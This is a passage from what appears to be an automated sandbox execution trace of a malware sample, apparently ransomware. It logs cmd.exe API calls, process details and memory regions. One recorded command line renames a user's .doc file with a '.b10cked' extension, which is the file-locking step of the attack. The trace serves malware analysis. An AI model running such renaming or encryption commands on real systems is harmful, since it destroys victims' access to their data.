_get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.747] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.748] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.749] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] GetFileType (hFile=0x4c) returned 0x1 [0140.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.749] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.750] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.750] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] GetFileType (hFile=0x4c) returned 0x1 [0140.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.750] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] GetFileType (hFile=0x4c) returned 0x1 [0140.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.751] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.752] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x32, lpOverlapped=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.752] GetFileType (hFile=0x4c) returned 0x1 [0140.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.752] GetFileType (hFile=0x4c) returned 0x1 [0140.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.752] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x32, lpOverlapped=0x0) returned 1 [0140.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.752] _close (_FileHandle=4) returned 0 [0140.752] FindNextFileW (in: hFindFile=0x270eb8, lpFindFileData=0x18f0ec | out: lpFindFileData=0x18f0ec) returned 0 [0140.753] GetLastError () returned 0x12 [0140.753] FindClose (in: hFindFile=0x270eb8 | out: hFindFile=0x270eb8) returned 1 [0140.753] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.754] _close (_FileHandle=3) returned 0 [0140.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.754] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.754] SetConsoleInputExeNameW () returned 0x1 [0140.754] GetConsoleOutputCP () returned 0x1b5 [0140.755] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.755] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.755] exit (_Code=0) Process: id = "151" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xd84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14546 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14547 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14548 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14549 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14550 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14551 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14552 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14553 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14554 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14555 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15786 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15787 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15788 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15789 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 15790 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 15791 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15792 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15793 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15794 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15795 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15796 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15797 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15798 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15799 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15800 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15801 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15802 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15803 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15804 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15805 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 15806 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 15807 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 15808 start_va = 0x10e0000 end_va = 0x1242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 15809 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 208 os_tid = 0xd80 [0140.667] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fccc | out: lpSystemTimeAsFileTime=0x16fccc*(dwLowDateTime=0x8dc704a0, dwHighDateTime=0x1d440a9)) [0140.667] GetCurrentProcessId () returned 0xd84 [0140.667] GetCurrentThreadId () returned 0xd80 [0140.667] GetTickCount () returned 0x2c264 [0140.667] QueryPerformanceCounter (in: lpPerformanceCount=0x16fcc4 | out: lpPerformanceCount=0x16fcc4*=19745654467) returned 1 [0140.668] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.668] __set_app_type (_Type=0x1) [0140.668] __p__fmode () returned 0x76b331f4 [0140.668] __p__commode () returned 0x76b331fc [0140.668] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.668] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.669] GetCurrentThreadId () returned 0xd80 [0140.669] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd80) returned 0x38 [0140.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.669] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.669] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.669] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fc5c | out: phkResult=0x16fc5c*=0x0) returned 0x2 [0140.669] VirtualQuery (in: lpAddress=0x16fc93, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.669] GetConsoleOutputCP () returned 0x1b5 [0140.670] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.670] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.670] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.670] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.670] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.670] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.670] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.671] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.671] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.671] GetEnvironmentStringsW () returned 0x2e01d8* [0140.671] FreeEnvironmentStringsW (penv=0x2e01d8) returned 1 [0140.671] GetEnvironmentStringsW () returned 0x2e01d8* [0140.671] FreeEnvironmentStringsW (penv=0x2e01d8) returned 1 [0140.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ebcc | out: phkResult=0x16ebcc*=0x40) returned 0x0 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x0, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x0, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegCloseKey (hKey=0x40) returned 0x0 [0140.672] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command 